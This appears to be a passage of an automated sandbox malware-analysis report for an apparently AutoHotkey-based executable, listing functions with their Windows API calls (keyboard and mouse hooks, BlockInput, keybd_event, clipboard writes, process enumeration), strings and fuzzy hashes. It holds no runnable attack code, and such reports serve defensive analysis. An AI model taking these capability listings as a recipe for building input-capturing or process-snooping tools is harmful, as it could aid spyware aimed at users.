Instruction ID: 7ca5e3cc2dcf4b7839d2972f6f83afb90a8d4c05b2d538d11b4a69c088501ef4
Opcode Fuzzy Hash: 895e2571ce56bf439ed436174a7f1bce11d350638faae127e52e4f2eb141d3ec
Instruction Fuzzy Hash: 55819D75A002059FDB10EFA9DD85AAEBBB8EB19314F10407FE540B72E2DB389D05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE90, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 169threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00002000,0040E1C0,00000000,00000000,004D6600), ref: 0040DEEA
SetThreadPriority.KERNEL32(00000000,0000000F,?,00408928,?,00408545,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000001,00406035,?,?,00000001), ref: 0040DF00
PostThreadMessageW.USER32 ref: 0040DF24
Sleep.KERNEL32(0000000A,?,00408928,?,00408545,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000001,00406035,?,?,00000001), ref: 0040DF30
GetTickCount.KERNEL32 ref: 0040DF47
PeekMessageW.USER32 ref: 0040DF6A
CreateMutexW.KERNEL32(00000000,00000000,AHK Keybd), ref: 0040DFE5
GetExitCodeThread.KERNEL32(?,?), ref: 0040DFFA
GetTickCount.KERNEL32 ref: 0040E00A
Sleep.KERNEL32(00000000), ref: 0040E017
CloseHandle.KERNEL32(?), ref: 0040E02F

Part of subcall function 0040E500: _free.LIBCMT ref: 0040E56D

CloseHandle.KERNEL32(?), ref: 0040E04F
CreateMutexW.KERNEL32(00000000,00000000,AHK Mouse), ref: 0040E074
CloseHandle.KERNEL32(?), ref: 0040E08B

Strings

AHK Mouse, xrefs: 0040E06B
Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function., xrefs: 0040E0B9
AHK Keybd, xrefs: 0040DFDC

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Thread$CloseCreateHandle$CountMessageMutexSleepTick$CodeExitPeekPostPriority_free
String ID: AHK Keybd$AHK Mouse$Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
API String ID: 1532042170-3816831916
Opcode ID: 14bfafd71805c4cbfffc1a8879ae0e43acd42f2cb1ae5619c321894b22d70e7e
Instruction ID: 28c8fa245ec90b1e42fc0f8466e77a05fa06499af188994f51a5e9b8afa44687
Opcode Fuzzy Hash: 14bfafd71805c4cbfffc1a8879ae0e43acd42f2cb1ae5619c321894b22d70e7e
Instruction Fuzzy Hash: D6515B31608340AAE7209F719C4976B7FE05B45308F04883FF685B62D2D2FC9948CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004061B8, Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 190COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 004061F0

Strings

version, xrefs: 00406238
language_, xrefs: 004061DF
name, xrefs: 0040621B
protocol_version, xrefs: 00406275
<response command="feature_get" feature_name="%e" supported="%i" transaction_id="%e">%s</response>, xrefs: 004063AC
supports_threads, xrefs: 004061FE
breakpoint_types, xrefs: 0040629D
max_depth, xrefs: 0040631C
max_data, xrefs: 004062CD
max_children, xrefs: 004062F7
supports_async, xrefs: 00406289
multiple_sessions, xrefs: 004062B9
encoding, xrefs: 00406259

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _strncmp
String ID: <response command="feature_get" feature_name="%e" supported="%i" transaction_id="%e">%s</response>$breakpoint_types$encoding$language_$max_children$max_data$max_depth$multiple_sessions$name$protocol_version$supports_async$supports_threads$version
API String ID: 909875538-401246380
Opcode ID: bb40b16782e234427f401bd57e87437aba9f94b3747c3e1014e8a28210dceb8e
Instruction ID: 67c986e1ea23358dad69bf1787bfeba8435f1f24894072b833f71a820d72fd15
Opcode Fuzzy Hash: bb40b16782e234427f401bd57e87437aba9f94b3747c3e1014e8a28210dceb8e
Instruction Fuzzy Hash: 46513A73704208BBDB248E908C41B963B55AB22314F1A807BFC06BF2C1D77A8D5557DD

Uniqueness

Uniqueness Score: -1.00%

Function 0045AC00, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?,745F9BC0,?,?,00000000), ref: 0045AC20
OpenProcess.KERNEL32(00001000,00000000,?), ref: 0045AC2F
GetModuleBaseNameW.PSAPI(00000000,00000000,?,00000104), ref: 0045AC55
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000104), ref: 0045AC5D
GetModuleHandleW.KERNEL32(psapi,GetProcessImageFileNameW), ref: 0045AC7F
GetProcAddress.KERNEL32(00000000), ref: 0045AC86
_wcsrchr.LIBCMT ref: 0045ACC8
_memmove.LIBCMT ref: 0045ACF7
CloseHandle.KERNEL32(00000000), ref: 0045AD00
QueryDosDeviceW.KERNEL32(?,?,00000104), ref: 0045AD34
CloseHandle.KERNEL32(00000000), ref: 0045AD71

Strings

:, xrefs: 0045AD18
GetProcessImageFileNameW, xrefs: 0045AC75
psapi, xrefs: 0045AC7A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: HandleModule$CloseNameOpenProcess$AddressBaseDeviceFileProcQuery_memmove_wcsrchr
String ID: :$GetProcessImageFileNameW$psapi
API String ID: 2203553739-2600028567
Opcode ID: 155fc08ce511a5cb0a7eb49c0b98b9877e3e730bbe5a1617cd2f01b53ee83022
Instruction ID: e7190d8712123e4c86540bf770460c6e666b9b9ec2c380e84010044bd2e23a7b
Opcode Fuzzy Hash: 155fc08ce511a5cb0a7eb49c0b98b9877e3e730bbe5a1617cd2f01b53ee83022
Instruction Fuzzy Hash: D34150726043015BD720BF65EC89BAB77A8FB94716F04053EFD0582242E77D981DC3AA

Uniqueness

Uniqueness Score: -1.00%

Function 00405C0E, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 108libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405C5D
_strcpy_s.LIBCMT ref: 00405C7F
_strcat_s.LIBCMT ref: 00405C91
LoadLibraryA.KERNEL32(?), ref: 00405CA6
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00405CB4
FreeLibrary.KERNEL32(00000000), ref: 00405CBF
_strcpy_s.LIBCMT ref: 00405CDA
_strcat_s.LIBCMT ref: 00405CEC
LoadLibraryA.KERNEL32(?), ref: 00405CFB
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00405D09
FreeLibrary.KERNEL32(00000000), ref: 00405D14
GetProcAddress.KERNEL32(00000000,004AF0A8), ref: 00405D27
FreeLibrary.KERNEL32(00000000), ref: 00405D3E

Strings

\ws2_32, xrefs: 00405C84
getaddrinfo, xrefs: 00405C21, 00405CAE, 00405D03
\wship6, xrefs: 00405CDF

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Library$AddressFreeProc$Load_strcat_s_strcpy_s$DirectorySystem
String ID: \ws2_32$\wship6$getaddrinfo
API String ID: 2766041494-3078833738
Opcode ID: 3c95cb1eb6baa2d7d986e3844fd70ff02d8a0d437549a95ce809fc80021e07ad
Instruction ID: 271425f00708cc84428181e27ba989a4429d077fb3cd58278cf2e1aec8209e28
Opcode Fuzzy Hash: 3c95cb1eb6baa2d7d986e3844fd70ff02d8a0d437549a95ce809fc80021e07ad
Instruction Fuzzy Hash: 3531A271500608AADB10ABA5DC8CAEF7BB8EF5A751F50407BE544E3241EB3CCA458F6D

Uniqueness

Uniqueness Score: -1.00%

Function 00481620, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136clipboardCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32(00000000,000000FF,?,004D870C,?), ref: 00481650
GlobalUnlock.KERNEL32(?), ref: 00481682
CloseClipboard.USER32 ref: 0048168E

Strings

GlobalLock, xrefs: 004817C4
Can't open clipboard for writing., xrefs: 00481639
Out of memory., xrefs: 0048176A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Clipboard$CloseEmptyGlobalUnlock
String ID: Can't open clipboard for writing.$GlobalLock$Out of memory.
API String ID: 219879227-2567692066
Opcode ID: bfde9c5aeacd413ea5ec889f74aff6d3e812758590b8df49f24f206c65519ac7
Instruction ID: f5f69e2dbef9a227b6859c30c8c1d7c21ed2cb2fc6f55d28a2b36e8dfcdf98a8
Opcode Fuzzy Hash: bfde9c5aeacd413ea5ec889f74aff6d3e812758590b8df49f24f206c65519ac7
Instruction Fuzzy Hash: 9041B135B023209BC750BF65AC94A6E7BA8EB86B41F14043FF90192360EF7948058B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00415DA0, Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 439keyboardwindowthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00415DCE
GetKeyboardState.USER32(?), ref: 00415E9A
SetKeyboardState.USER32(?), ref: 00415F39
PostMessageW.USER32(00000000,00000100,?,00000000), ref: 00415F65
PostMessageW.USER32(00000000,00000101,?,00000000), ref: 00415FA2
BlockInput.USER32(00000000), ref: 00415FDE
GetForegroundWindow.USER32 ref: 0041603C
GetAsyncKeyState.USER32 ref: 0041606C
keybd_event.USER32(?,00000000,?,00000000), ref: 00416137
GetAsyncKeyState.USER32(?), ref: 00416182
keybd_event.USER32(?,00000000,00000002,00000000), ref: 00416262
GetAsyncKeyState.USER32(?), ref: 0041629D
BlockInput.USER32(00000001), ref: 004162FE

Strings

,fM, xrefs: 00415FFD

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: State$Async$BlockInputKeyboardMessagePostkeybd_event$CurrentForegroundThreadWindow
String ID: ,fM
API String ID: 802988723-4124874650
Opcode ID: c3120f4e6b8a79592d777ad518c74efa6ebf437138b0f2cfc6b525cfd564d683
Instruction ID: 8ac56d1e15b53d51d173ea622eabb5305dcda07c61d2a06076a86c03db966085
Opcode Fuzzy Hash: c3120f4e6b8a79592d777ad518c74efa6ebf437138b0f2cfc6b525cfd564d683
Instruction Fuzzy Hash: 2202D0B05083859BEB21DF24D8447EB7BE1AB96304F08485FF89447392D63DD9C9CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00452140, Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 271COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 004521F7
__wcsicoll.LIBCMT ref: 00452234
__wcsicoll.LIBCMT ref: 004522BC
__wcsicoll.LIBCMT ref: 004522F9
__wcsicoll.LIBCMT ref: 00452336
__wcsicoll.LIBCMT ref: 0045236E
__wcsicoll.LIBCMT ref: 004523AE
__wcsicoll.LIBCMT ref: 004523ED

Strings

Pos, xrefs: 004522B6
Len, xrefs: 004522F3
Name, xrefs: 00452368
Count, xrefs: 00452330
Value, xrefs: 004523E7
Mark, xrefs: 004523A8

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Count$Len$Mark$Name$Pos$Value
API String ID: 3832890014-945282619
Opcode ID: c437baeeb957d3f6f094edd2482739e1175a87984d60d150036e17de3dc1f3ab
Instruction ID: 68675ac475a7596e22f3a1363d7010c6cbbe1d474ee3c7867788a204edac6e36
Opcode Fuzzy Hash: c437baeeb957d3f6f094edd2482739e1175a87984d60d150036e17de3dc1f3ab
Instruction Fuzzy Hash: FE91F3356002059BC730CE19DA8076B73A0EB97316F1445AFEC458B383D7B9E95ECBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00480640, Relevance: 24.1, APIs: 16, Instructions: 110windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0048065C
CreateCompatibleDC.GDI32(00000000), ref: 00480669
GetIconInfo.USER32(?,?), ref: 0048067F
GetObjectW.GDI32(?,00000018,?,?,76995B70), ref: 00480699
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004806B2
SelectObject.GDI32(00000000,00000000), ref: 004806C0
CreateSolidBrush.GDI32(FF000000), ref: 004806EB
FillRect.USER32 ref: 004806FA
DeleteObject.GDI32(00000000), ref: 00480701
DrawIconEx.USER32 ref: 00480721
SelectObject.GDI32(00000000,00000000), ref: 00480729
DeleteObject.GDI32(?), ref: 0048073E
DeleteObject.GDI32(?), ref: 00480745
DeleteDC.GDI32(00000000), ref: 0048074C
ReleaseDC.USER32 ref: 00480755
DestroyIcon.USER32(?,?,76995B70), ref: 0048075C

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Object$Delete$CreateIcon$CompatibleSelect$BitmapBrushDestroyDrawFillInfoRectReleaseSolid
String ID:
API String ID: 2104539931-0
Opcode ID: 675af1a2a935225ce5d135242d896b2979c86fca9c6491d95c0a3cb3b5526ac4
Instruction ID: 7e4f52245d3d6b5428d576c3440bd80a5689b0ab670a3357cab2054e6a4d48fe
Opcode Fuzzy Hash: 675af1a2a935225ce5d135242d896b2979c86fca9c6491d95c0a3cb3b5526ac4
Instruction Fuzzy Hash: 9E312375209301AFD3509BA5DC84E6F7BF8EB8A701F40452DF645D2250DB74ED058B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C8B0, Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 410COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0042C910
__wcsicoll.LIBCMT ref: 0042C962
_memmove.LIBCMT ref: 0042CACE
_memmove.LIBCMT ref: 0042CC56
__wcsicoll.LIBCMT ref: 0042CC9E
__wcsicoll.LIBCMT ref: 0042CD3F
_memmove.LIBCMT ref: 0042CD7A

Strings

Illegal parameter name., xrefs: 0042C99A
Variable name too long., xrefs: 0042C8F2
Out of memory., xrefs: 0042CBE1
", xrefs: 0042C9E8
ErrorLevel, xrefs: 0042C95C

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll_memmove$_wcsncpy
String ID: "$ErrorLevel$Illegal parameter name.$Out of memory.$Variable name too long.
API String ID: 3055118137-3900197193
Opcode ID: fa51d62dc0a26f2a5972de01e395d6cdf899f3b9a16cb51ab827b182587de3e2
Instruction ID: 70fa66c313cb702d0816f2b9091adbfd542a1b233e92206a2ab2f17383985c85
Opcode Fuzzy Hash: fa51d62dc0a26f2a5972de01e395d6cdf899f3b9a16cb51ab827b182587de3e2
Instruction Fuzzy Hash: 33E1CF756042258FC720DF18E8C0AAAB7E0FF98314F54462EE8489B351E779EE45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00457040, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 277windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000040B,00000000,00000000), ref: 0045716F
MulDiv.KERNEL32(00000000,?,00000060), ref: 004571CC
SendMessageW.USER32(?), ref: 004571FA
SendMessageW.USER32(?,00000414,00000001,00000000), ref: 00457213
DestroyIcon.USER32(00000000), ref: 0045721A
SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00457237

Strings

$%K, xrefs: 00457099

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: MessageSend$DestroyIcon
String ID: $%K
API String ID: 3419509030-3388506065
Opcode ID: 0ac99bd40cabc6a43c4ad9bf54ff327c1e6cbc6bd7fa956c438a7c883104b2e7
Instruction ID: d2fd1e80d010dc81eeeb558c0609c20658b2cff156483a6b137ce6e9d6341820
Opcode Fuzzy Hash: 0ac99bd40cabc6a43c4ad9bf54ff327c1e6cbc6bd7fa956c438a7c883104b2e7
Instruction Fuzzy Hash: 5C91B0716083019BD710CF69E881B2BB7E5EB84316F14457EFD089B382D735E809CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100clipboardCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32(00000000,00000000,004D870C,00447021,00000000,00000001,00000000), ref: 00404EF4
GlobalUnlock.KERNEL32(00000000), ref: 00404F0B
CloseClipboard.USER32 ref: 00404F14
GlobalUnlock.KERNEL32(00000000,?,-00000001), ref: 00404F4B
GlobalFree.KERNEL32 ref: 00404F5D
GlobalUnlock.KERNEL32(?,-00000001), ref: 00404F73
CloseClipboard.USER32(-00000001), ref: 00404F78

Part of subcall function 00404FD0: GlobalUnlock.KERNEL32(00000000,73BB55F0,?,00000000,00404FC9,SetClipboardData), ref: 00404FEC
Part of subcall function 00404FD0: CloseClipboard.USER32(73BB55F0,?,00000000,00404FC9,SetClipboardData), ref: 00404FF1
Part of subcall function 00404FD0: GlobalUnlock.KERNEL32(?,73BB55F0,?,00000000,00404FC9,SetClipboardData), ref: 00405005
Part of subcall function 00404FD0: GlobalFree.KERNEL32 ref: 00405015

Strings

EmptyClipboard, xrefs: 00404F1F
Can't open clipboard for writing., xrefs: 00404EE6
SetClipboardData, xrefs: 00404FBF

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Global$Unlock$Clipboard$Close$Free$Empty
String ID: Can't open clipboard for writing.$EmptyClipboard$SetClipboardData
API String ID: 1414016178-2690908087
Opcode ID: 4f9724406794eba667240a428d6f9f72f5700d4bb0aa02c7f30f4558070884a8
Instruction ID: d15912cfb63147e1f490077167c57cfb49e64acdc2250f44bcce35921dac81fe
Opcode Fuzzy Hash: 4f9724406794eba667240a428d6f9f72f5700d4bb0aa02c7f30f4558070884a8
Instruction Fuzzy Hash: 03313EB16017029FD7309FA6D8C4417FBE4EF95315724893FE69692A91CB38A880CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004075B1, Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 370COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004075B6

Part of subcall function 0040529D: __EH_prolog.LIBCMT ref: 004052A2

__wcsicoll.LIBCMT ref: 0040768E
__wcsicoll.LIBCMT ref: 004076B5
__wcsnicmp.LIBCMT ref: 00407835
_wcschr.LIBCMT ref: 00407847
_wcschr.LIBCMT ref: 00407873
__wcsicoll.LIBCMT ref: 0040790B
__wcsicoll.LIBCMT ref: 0040791F

Strings

., xrefs: 00407897
base, xrefs: 00407905
.<base>, xrefs: 00407916
Object(, xrefs: 0040782F

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$H_prolog_wcschr$__wcsnicmp
String ID: .$.<base>$Object($base
API String ID: 2565995173-3633111095
Opcode ID: dd655f9a30eeea055d8def07e823f606819731bc01b614dd5ed391244da3c388
Instruction ID: bef8def79940beb76dd7a28264988766792c805af7db40f84f253061f30e1a68
Opcode Fuzzy Hash: dd655f9a30eeea055d8def07e823f606819731bc01b614dd5ed391244da3c388
Instruction Fuzzy Hash: E5D1FE71E082159BDB219F59C841AAB77A1EF55364F20803BE801AB3D0E77DBD41CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00442940, Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 289COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044298F

Strings

%sTop, xrefs: 00442AB7
%sLeft, xrefs: 00442A7B
Parameter #2 invalid., xrefs: 0044296B
%sRight, xrefs: 00442AE7
%sBottom, xrefs: 00442B17
h, xrefs: 00442998

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _memset
String ID: %sBottom$%sLeft$%sRight$%sTop$Parameter #2 invalid.$h
API String ID: 2102423945-3189716140
Opcode ID: accafad49cd0d96c7c3ed98528e6be9ce9eb1c80882ac2eec6abf121c6daa008
Instruction ID: 7e443b16a8418059f1a1981f1f0f0840d1b42dc06ba21b68697f189320cfbce3
Opcode Fuzzy Hash: accafad49cd0d96c7c3ed98528e6be9ce9eb1c80882ac2eec6abf121c6daa008
Instruction Fuzzy Hash: C891B3723042006BE210EE5ADC91FAFB399EBC8755F40852FF948D7281DA79DD4487AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041E000, Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 00482B80: GetForegroundWindow.USER32(?,?,?,0040EC6F,004D6340,004AE8F8,00000000,00000000,00000000,00000000), ref: 00482BC1
Part of subcall function 00482B80: IsWindowVisible.USER32(00000000), ref: 00482BD6

GetClassNameW.USER32 ref: 0041E057
__wcsnicmp.LIBCMT ref: 0041E0A1
_wcsrchr.LIBCMT ref: 0041E111
__wcsicoll.LIBCMT ref: 0041E123

Strings

"%s", xrefs: 0041E0C9
notepad.exe, xrefs: 0041E167
edit, xrefs: 0041E0F6
.ini, xrefs: 0041E11D
Could not open script., xrefs: 0041E184
open, xrefs: 0041E140
AutoHotkey, xrefs: 0041E09B
#32770, xrefs: 0041E05D

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
